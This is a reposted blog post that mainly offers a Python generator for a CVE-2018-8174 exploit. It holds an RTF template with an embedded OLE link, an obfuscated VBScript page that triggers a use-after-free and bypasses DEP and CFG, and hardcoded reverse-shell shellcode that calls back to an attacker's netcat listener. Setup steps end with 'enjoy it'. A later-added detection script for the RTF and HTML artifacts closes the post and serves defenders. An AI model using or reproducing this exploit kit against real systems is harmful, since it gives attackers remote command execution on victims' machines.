CVE-2018-8174 EXP 0day python

usage: CVE-2018-8174.py [-h] -u URL -o OUTPUT [-i IP] [-p PORT]

Exploit for CVE-2018-8174

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     exp url
  -o OUTPUT, --output OUTPUT
                        Output exploit rtf
  -i IP, --ip IP        ip for netcat
  -p PORT, --port PORT  port for netcat

eg:

  1. python CVE-2018-8174.py -u http://1.1.1.1/exploit.html -o exp.rtf -i 2.2.2.2 -p 4444
  2. put exploit.html on your server (1.1.1.1)
  3. netcat listen on [any] 4444 (2.2.2.2)

enjoy it !

POC:

import argparse
import struct

SampleRTF = R"""{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Msftedit 5.41.21.2510;}\viewkind4\uc1\pard\sa200\sl276\slmult1\lang9\f0\fs22{\object\objautlink\objupdate\rsltpict\objw4321\objh4321{\*\objclass htmlfile}{\*\objdata 0105000002000000090000004f4c45324c696e6b000000000000000000000a0000
d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000903b
beae04f2d30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
000000000000000000000000f20000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
000000000000000000000000050000008100000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000021000c0000005f31353838343937393534000000000080000000e0c9ea79f9bace118c8200aa004ba90b68000000
UNICODE_URL
000000795881f43b1d7f48af2c825dc485276300000000a5ab0000ffffffff20693325f903cf118fd000aa00686f1300000000ffffffff0000
000000000000e05dd6ab04f2d30100000000000000000000000000000000000000000000100203000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002700
NORMAL_URL
0000bbbbcccc2700
UNICODE_URL
0000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000d0000004d45544146494c45504943540000000000000000005e0000000800000000000000
0100090000032b00000000000500000000000400000003010800050000000b0200000000050000000c0200000000030000001e00050000000d0200000000050000000d0200000000040000002701ffff030000000000}
}\par
}
"""

SampleHTML = R"""
<!doctype html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="x-ua-compatible" content="IE=10">
<meta http-equiv="Expires" content="0">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-control" content="no-cache">
<meta http-equiv="Cache" content="no-cache">
</head>
<body>
<script language="vbscript">
Dim lIIl
Dim IIIlI(6),IllII(6)
Dim IllI
Dim IIllI(40)
Dim lIlIIl,lIIIll
Dim IlII
Dim llll,IIIIl
Dim llllIl,IlIIII
Dim NtContinueAddr,VirtualProtectAddr
IlII=195948557
lIlIIl=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000")
lIIIll=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000")
IllI=195890093
Function IIIII(Domain)
    lIlII=0
    IllllI=0
    IIlIIl=0
    Id=CLng(Rnd*1000000)
    lIlII=CLng((&h27d+8231-&H225b)*Rnd)Mod (&h137d+443-&H152f)+(&h1c17+131-&H1c99)
    If(Id+lIlII)Mod (&h5c0+6421-&H1ed3)=(&h10ba+5264-&H254a) Then
        lIlII=lIlII-(&h86d+6447-&H219b)
    End If
    IllllI=CLng((&h2bd+6137-&H1a6d)*Rnd)Mod (&h769+4593-&H1940)+(&h1a08+2222-&H2255)
    IIlIIl=CLng((&h14e6+1728-&H1b5d)*Rnd)Mod (&hfa3+1513-&H1572)+(&h221c+947-&H256e)
    IIIII=Domain &"?" &Chr(IllllI) &"=" &Id &"&" &Chr(IIlIIl) &"=" &lIlII
End Function
Function lIIII(ByVal lIlIl)
    IIll=""
    For index=0 To Len(lIlIl)-1
        IIll=IIll &lIlI(Asc(Mid(lIlIl,index+1,1)),2)
    Next
    IIll=IIll &"00"
    If Len(IIll)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then
        IIll=IIll &"00"
    End If
    For IIIl=(&h1a1a+3208-&H26a2) To Len(IIll)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4)
        lIIIlI=Mid(IIll,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3))
        lIlIll=Mid(IIll,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504))
        lIIII=lIIII &"%u" &lIlIll &lIIIlI
    Next
End Function
Function lIlI(ByVal Number,ByVal Length)
    IIII=Hex(Number)
    If Len(IIII)<Length Then
        IIII=String(Length-Len(IIII),"0") &IIII    'pad align with zeros
    Else
        IIII=Right(IIII,Length)
    End If
    lIlI=IIII
End Function
Function GetUint32(lIII)
    Dim value
    llll.mem(IlII+8)=lIII+4
    llll.mem(IlII)=8        'type string
    value=llll.P0123456789
    llll.mem(IlII)=2
    GetUint32=value
End Function
Function IllIIl(lIII)
    IllIIl=GetUint32(lIII) And (131071-65536)
End Function
Function lllII(lIII)
    lllII=GetUint32(lIII)  And (&h17eb+1312-&H1c0c)
End Function
Sub llllll
End Sub
Function GetMemValue
    llll.mem(IlII)=(&h713+3616-&H1530)
    GetMemValue=llll.mem(IlII+(&h169c+712-&H195c))
End Function
Sub SetMemValue(ByRef IlIIIl)
    llll.mem(IlII+(&h715+3507-&H14c0))=IlIIIl
End Sub
Function LeakVBAddr
    On Error Resume Next
    Dim lllll
    lllll=llllll
    lllll=null
    SetMemValue lllll
    LeakVBAddr=GetMemValue()
End Function
Function GetBaseByDOSmodeSearch(IllIll)
    Dim llIl
    llIl=IllIll And &hffff0000
    Do While GetUint32(llIl+(&h748+4239-&H176f))<>544106784 Or GetUint32(llIl+(&ha2a+7373-&H268b))<>542330692
        llIl=llIl-65536
    Loop
    GetBaseByDOSmodeSearch=llIl
End Function
Function StrCompWrapper(lIII,llIlIl)
    Dim lIIlI,IIIl
    lIIlI=""
    For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835)
        lIIlI=lIIlI &Chr(lllII(lIII+IIIl))
    Next
    StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl))
End Function
Function GetBaseFromImport(base_address,name_input)
    Dim import_rva,nt_header,descriptor,import_dir
    Dim IIIIII
    nt_header=GetUint32(base_address+(&h3c))
    import_rva=GetUint32(base_address+nt_header+&h80)
    import_dir=base_address+import_rva
    descriptor=0
    Do While True
        Dim Name
        Name=GetUint32(import_dir+descriptor*(&h14)+&hc)
        If Name=0 Then
            GetBaseFromImport=&hBAAD0000
            Exit Function
        Else
            If StrCompWrapper(base_address+Name,name_input)=0 Then
                Exit Do
            End If
        End If
        descriptor=descriptor+1
    Loop
    IIIIII=GetUint32(import_dir+descriptor*(&h14)+&h10)
    GetBaseFromImport=GetBaseByDOSmodeSearch(GetUint32(base_address+IIIIII))
End Function
Function GetProcAddr(dll_base,name)
    Dim p,export_dir,index
    Dim function_rvas,function_names,function_ordin
    Dim Illlll
    p=GetUint32(dll_base+&h3c)
    p=GetUint32(dll_base+p+&h78)
    export_dir=dll_base+p
    function_rvas=dll_base+GetUint32(export_dir+&h1c)
    function_names=dll_base+GetUint32(export_dir+&h20)
    function_ordin=dll_base+GetUint32(export_dir+&h24)
    index=0
    Do While True
        Dim lllI
        lllI=GetUint32(function_names+index*4)
        If StrCompWrapper(dll_base+lllI,name)=0 Then
            Exit Do
        End If
        index=index+1
    Loop
    Illlll=IllIIl(function_ordin+index*2)
    p=GetUint32(function_rvas+Illlll*4)
    GetProcAddr=dll_base+p
End Function
Function GetShellcode()
    IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("REPLACE_SHELLCODE_HERE" &lIIII(IIIII("")))
    IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
    GetShellcode=IIlI
End Function
Function EscapeAddress(ByVal value)
    Dim High,Low
    High=lIlI((value And &hffff0000)/&h10000,4)
    Low=lIlI(value And &hffff,4)
    EscapeAddress=Unescape("%u" &Low &"%u" &High)
End Function
Function lIllIl
    Dim IIIl,IlllI,IIlI,IlIII,llllI,llIII,lIllI
    IlllI=lIlI(NtContinueAddr,8)
    IlIII=Mid(IlllI,1,2)
    llllI=Mid(IlllI,3,2)
    llIII=Mid(IlllI,5,2)
    lIllI=Mid(IlllI,7,2)
    IIlI=""
    IIlI=IIlI &"%u0000%u" &lIllI &"00"
    For IIIl=1 To 3
        IIlI=IIlI &"%u" &llllI &llIII
        IIlI=IIlI &"%u" &lIllI &IlIII
    Next
    IIlI=IIlI &"%u" &llllI &llIII
    IIlI=IIlI &"%u00" &IlIII
    lIllIl=Unescape(IIlI)
End Function
Function WrapShellcodeWithNtContinueContext(ShellcodeAddrParam) 'bypass cfg
    Dim IIlI
    IIlI=String((100334-65536),Unescape("%u4141"))
    IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
    IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
    IIlI=IIlI &EscapeAddress(&h3000)
    IIlI=IIlI &EscapeAddress(&h40)
    IIlI=IIlI &EscapeAddress(ShellcodeAddrParam-8)
    IIlI=IIlI &String(6,Unescape("%u4242"))
    IIlI=IIlI &lIllIl()
    IIlI=IIlI &String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
    WrapShellcodeWithNtContinueContext=IIlI
End Function
Function ExpandWithVirtualProtect(lIlll)
    Dim IIlI
    Dim lllllI
    lllllI=lIlll+&h23
    IIlI=""
    IIlI=IIlI &EscapeAddress(lllllI)
    IIlI=IIlI &String((&hb8-LenB(IIlI))/2,Unescape("%4141"))
    IIlI=IIlI &EscapeAddress(VirtualProtectAddr)
    IIlI=IIlI &EscapeAddress(&h1b)
    IIlI=IIlI &EscapeAddress(0)
    IIlI=IIlI &EscapeAddress(lIlll)
    IIlI=IIlI &EscapeAddress(&h23)
    IIlI=IIlI &String((&400-LenB(IIlI))/2,Unescape("%u4343"))
    ExpandWithVirtualProtect=IIlI
End Function
Sub ExecuteShellcode
    llll.mem(IlII)=&h4d 'DEP bypass
    llll.mem(IlII+8)=0
    msgbox(IlII)        'VT replaced
End Sub
Class cla1
Private Sub Class_Terminate()
    Set IIIlI(IllI)=lIIl((&h1078+5473-&H25d8))
    IllI=IllI+(&h14b5+2725-&H1f59)
    lIIl((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d)
End Sub
End Class
Class cla2
Private Sub Class_Terminate()
    Set IllII(IllI)=lIIl((&h15b+3616-&Hf7a))
    IllI=IllI+(&h880+542-&Ha9d)
    lIIl((&h1f75+342-&H20ca))=(&had3+3461-&H1857)
End Sub
End Class
Class IIIlIl
End Class
Class llIIl
Dim mem
Function P
End Function
Function SetProp(Value)
    mem=Value
    SetProp=0
End Function
End Class
Class IIIlll
Dim mem
Function P0123456789
    P0123456789=LenB(mem(IlII+8))
End Function
Function SPP
End Function
End Class
Class lllIIl
Public Default Property Get P
Dim llII
P=174088534690791e-324
For IIIl=(&h7a0+4407-&H18d7) To (&h2eb+1143-&H75c)
    IIIlI(IIIl)=(&h2176+711-&H243d)
Next
Set llII=New IIIlll
llII.mem=lIlIIl
For IIIl=(&h1729+3537-&H24fa) To (&h1df5+605-&H204c)
    Set IIIlI(IIIl)=llII
Next
End Property
End Class
Class llllII
Public Default Property Get P
Dim llII
P=636598737289582e-328
For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84)
    IllII(IIIl)=(&h442+2598-&He68)
Next
Set llII=New IIIlll
llII.mem=lIIIll
For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b)
    Set IllII(IIIl)=llII
Next
End Property
End Class
Set llllIl=New lllIIl
Set IlIIII=New llllII
Sub UAF
    For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233)
        Set IIllI(IIIl)=New IIIlIl
    Next
    For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed)
        Set IIllI(IIIl)=New llIIl
    Next
    IllI=0
    For IIIl=0 To 6
        ReDim lIIl(1)
        Set lIIl(1)=New cla1
        Erase lIIl
    Next
    Set llll=New llIIl
    IllI=0
    For IIIl=0 To 6
        ReDim lIIl(1)
        Set lIIl(1)=New cla2
        Erase lIIl
    Next
    Set IIIIl=New llIIl
End Sub
Sub InitObjects
    llll.SetProp(llllIl)
    IIIIl.SetProp(IlIIII)
    IlII=IIIIl.mem
End Sub
Sub StartExploit
    UAF
    InitObjects
    vb_adrr=LeakVBAddr()
    // Alert "CScriptEntryPointObject Leak: 0x" & Hex(vb_adrr) & vbcrlf & "VirtualTable address: 0x" & Hex(GetUint32(vb_adrr))
    vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))
    // Alert "VBScript Base: 0x" & Hex(vbs_base)
    msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll")
    // Alert "MSVCRT Base: 0x" & Hex(msv_base)
    krb_base=GetBaseFromImport(msv_base,"kernelbase.dll")
    // Alert "KernelBase Base: 0x" & Hex(krb_base)
    ntd_base=GetBaseFromImport(msv_base,"ntdll.dll")
    // Alert "Ntdll Base: 0x" & Hex(ntd_base)
    VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect")
    // Alert "KernelBase!VirtualProtect Address 0x" & Hex(VirtualProtectAddr)
    NtContinueAddr=GetProcAddr(ntd_base,"NtContinue")
    // Alert "KernelBase!VirtualProtect Address 0x" & Hex(NtContinueAddr)
    SetMemValue GetShellcode()
    ShellcodeAddr=GetMemValue()+8
    // Alert "Shellcode Address 0x" & Hex(ShellcodeAddr)
    SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
    lIlll=GetMemValue()+69596
    SetMemValue ExpandWithVirtualProtect(lIlll)
    llIIll=GetMemValue()
    // Alert "Executing Shellcode"
    ExecuteShellcode
End Sub
StartExploit
</script>
</body>
</html>
"""

reverseip = '1.1.1.1'
reverseport = 4444

def create_rtf_file(url,filename):
    NORMAL_URL = url.encode('hex')+"0"*(78-len(url.encode('hex')))
    UNICODE_URL = "00".join("{:02x}".format(ord(c)) for c in url)
    if len(UNICODE_URL) < 154:
        print 'UNICODE_URL len %d , need to pad ...' % len(UNICODE_URL)
        UNICODE_URL = UNICODE_URL+"0"*(154 - len(UNICODE_URL))
    res = SampleRTF.replace('NORMAL_URL',NORMAL_URL).replace('UNICODE_URL',UNICODE_URL)
    f = open(filename, 'w')
    f.write(res)
    f.close()
    print "Generated "+filename+" successfully"


def rev_shellcode(ip,port):
    ip = [int(i) for i in ip.split(".")]
    buf =  ""
    buf += "\xfc\xe9\x8a\x00\x00\x00\x5d\x83\xc5\x0b\x81\xc4\x70"
    buf += "\xfe\xff\xff\x8d\x54\x24\x60\x52\x68\xb1\x4a\x6b\xb1"
    buf += "\xff\xd5\x8d\x44\x24\x60\xeb\x5c\x5e\x8d\x78\x60\x57"
    buf += "\x50\x31\xdb\x53\x53\x68\x04\x00\x00\x08\x53\x53\x53"
    buf += "\x56\x53\x68\x79\xcc\x3f\x86\xff\xd5\x85\xc0\x74\x59"
    buf += "\x6a\x40\x80\xc7\x10\x53\x53\x31\xdb\x53\xff\x37\x68"
    buf += "\xae\x87\x92\x3f\xff\xd5\x54\x68\x44\x01\x00\x00\xeb"
    buf += "\x39\x50\xff\x37\x68\xc5\xd8\xbd\xe7\xff\xd5\x53\x53"
    buf += "\x53\x8b\x4c\x24\xfc\x51\x53\x53\xff\x37\x68\xc6\xac"
    buf += "\x9a\x79\xff\xd5\xe9\x41\x01\x00\x00\xe8\x9f\xff\xff"
    buf += "\xff\x72\x75\x6e\x64\x6c\x6c\x33\x32\x2e\x65\x78\x65"
    buf += "\x00\xe8\x71\xff\xff\xff\xe8\xc2\xff\xff\xff\xfc\xe8"
    buf += "\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
    buf += "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
    buf += "\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01"
    buf += "\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c"
    buf += "\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b"
    buf += "\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac"
    buf += "\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b"
    buf += "\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c"
    buf += "\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44"
    buf += "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"
    buf += "\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73"
    buf += "\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
    buf += "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5"
    buf += "\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0"
    buf += "\xff\xd5\x97\x6a\x05\x68"+struct.pack("!4B",ip[0],ip[1],ip[2],ip[3])+"\x68\x02\x00"
    buf += struct.pack("!H",port)+"\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
    buf += "\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0"
    buf += "\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57"
    buf += "\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44"
    buf += "\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50"
    buf += "\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc"
    buf += "\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08"
    buf += "\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95"
    buf += "\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05"
    buf += "\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"

    return buf.encode("hex")

def gen_shellcode(s):
    n = len(s)
    i = 0
    strs = ''
    if n % 4 == 2:
        s=s+'41'
    while i <n:
        strs += '%u'+s[i+2:i+4]+s[i:i+2]
        i+=4
    return strs

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Exploit for CVE-2018-8174")
    parser.add_argument("-u", "--url", help="exp url", required=True)
    parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
    parser.add_argument('-i', "--ip", help="ip for netcat", required=False)
    parser.add_argument('-p', "--port", help="port for netcat", required=False)
    args = parser.parse_args()
    url = args.url
    filename = args.output
    create_rtf_file(url,filename)
    if args.ip and args.port:
        ip = str(args.ip)
        port = int(args.port)
        shellcode = gen_shellcode(rev_shellcode(ip,port))
    else:
        shellcode = gen_shellcode(rev_shellcode(reverseip,reverseport))
    res = SampleHTML.replace('REPLACE_SHELLCODE_HERE',shellcode)
    f = open('exploit.html', 'w')
    f.write(res)
    f.close()

    print "!!! Completed !!!"
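The generator above leaves two artifacts that a defender can recognise without running anything: an RTF whose \objdata carries an OLE2Link object with the URL moniker pointing at the attacker's page, and an HTML page whose VBScript block contains the Class_Terminate / ReDim / Erase trigger sequence. The Python 3 script below is an added triage example, not part of the original post; it decodes the \objdata hex, looks for the "OLE2Link" marker (hex 4f4c45324c696e6b in the template), the serialized URL moniker CLSID e0c9ea79f9bace118c8200aa004ba90b ({79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}), and pulls the UTF-16LE URL that follows its length field, then applies the same idea to the HTML side. The sample RTF and HTML it checks are constructed inline (no exploit content) and the function and regex names are my own.

```python
# Added defensive example (not from the original post): triage the RTF and HTML
# artifacts described above. Only reads text; the sample inputs are constructed.
import re
import struct

# Indicators taken from the SampleRTF template: "4f4c45324c696e6b" decodes to ASCII
# "OLE2Link"; "e0c9ea79f9bace118c8200aa004ba90b" is the little-endian serialized URL
# moniker CLSID, followed by a DWORD byte count and the UTF-16LE target URL.
OLE2LINK_MARKER = b"OLE2Link"
URL_MONIKER_CLSID = bytes.fromhex("e0c9ea79f9bace118c8200aa004ba90b")
OBJDATA_RE = re.compile(r"\{\\\*\\objdata\s*([0-9a-fA-F\s]+)\}")
OBJCLASS_RE = re.compile(r"\{\\\*\\objclass\s+([^}]+)\}")
NOT_HEX = re.compile(r"[^0-9a-fA-F]")


def extract_objdata(rtf_text):
    """Decode every {\\*\\objdata ...} group; the hex is usually wrapped over many lines."""
    blobs = []
    for match in OBJDATA_RE.finditer(rtf_text):
        hexstr = NOT_HEX.sub("", match.group(1))
        if len(hexstr) % 2:            # truncated trailing nibble: drop it rather than fail
            hexstr = hexstr[:-1]
        blobs.append(bytes.fromhex(hexstr))
    return blobs


def extract_moniker_url(blob):
    """Return the UTF-16LE URL after the URL moniker CLSID, or None if the CLSID is absent."""
    idx = blob.find(URL_MONIKER_CLSID)
    if idx < 0:
        return None
    size_off = idx + len(URL_MONIKER_CLSID)
    if size_off + 4 > len(blob):       # CLSID present but the length field is cut off
        return None
    (size,) = struct.unpack_from("<I", blob, size_off)
    chunk = blob[size_off + 4:size_off + 4 + size]
    end = 0                            # walk 2-byte units up to the UTF-16 NUL terminator
    while end + 1 < len(chunk) and chunk[end:end + 2] != b"\x00\x00":
        end += 2
    return chunk[:end].decode("utf-16-le", errors="replace")


def triage_rtf(rtf_text):
    """Report which of the template's indicators an RTF carries and any embedded URLs."""
    classes = [c.strip().lower() for c in OBJCLASS_RE.findall(rtf_text)]
    report = {"objclass_htmlfile": "htmlfile" in classes,
              "ole2link": False, "url_moniker": False, "urls": []}
    for blob in extract_objdata(rtf_text):
        if OLE2LINK_MARKER in blob:
            report["ole2link"] = True
        url = extract_moniker_url(blob)
        if url is not None:
            report["url_moniker"] = True
            if url:
                report["urls"].append(url)
    report["suspicious"] = report["objclass_htmlfile"] and report["url_moniker"]
    return report


# Structural markers of the VBScript side as it appears in SampleHTML above.
VBS_MARKERS = {
    "vbscript_block": re.compile(r'<script[^>]*language\s*=\s*"?vbscript"?', re.I),
    "class_terminate": re.compile(r"\bClass_Terminate\b", re.I),
    "redim_then_erase": re.compile(r"\bReDim\b[\s\S]{0,200}?\bErase\b", re.I),
}


def triage_html(html_text):
    """Flag HTML whose script block shows all three markers together."""
    hits = {name: bool(rx.search(html_text)) for name, rx in VBS_MARKERS.items()}
    hits["suspicious"] = (hits["vbscript_block"] and hits["class_terminate"]
                          and hits["redim_then_erase"])
    return hits


def build_sample_rtf(url):
    """Constructed sample with the template's layout (not a working document): OLE2Link
    marker, filler, URL moniker CLSID, byte count, NUL-terminated UTF-16LE URL, padding."""
    url_bytes = url.encode("utf-16-le") + b"\x00\x00"
    payload = (OLE2LINK_MARKER + b"\x00" * 8 + URL_MONIKER_CLSID
               + struct.pack("<I", len(url_bytes)) + url_bytes + b"\x00" * 8)
    hexdata = payload.hex()
    wrapped = "\n".join(hexdata[i:i + 64] for i in range(0, len(hexdata), 64))
    return ("{\\rtf1\\ansi{\\object\\objautlink\\objupdate{\\*\\objclass htmlfile}"
            "{\\*\\objdata " + wrapped + "}}\\par}")


# Constructed HTML fragment that only mimics the shape of the trigger for the regexes.
SAMPLE_HTML = """<html><body><script language="vbscript">
Class c1
Private Sub Class_Terminate()
End Sub
End Class
Sub Trigger
    ReDim arr(1)
    Set arr(1)=New c1
    Erase arr
End Sub
</script></body></html>"""

if __name__ == "__main__":
    print(triage_rtf(build_sample_rtf("http://example.invalid/poc.html")))
    print(triage_html(SAMPLE_HTML))
```

Both checks are deliberately structural rather than signature-based: the generator randomises the query string and can change the URL, so matching on the OLE2Link marker, the moniker CLSID and the VBScript trigger shape survives those variations, and the extracted URL gives the analyst the host to block or look up in proxy logs.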

Original source: https://www.cnblogs.com/wushangguo/p/9112753.html

Time: 2024-10-18 10:32:07
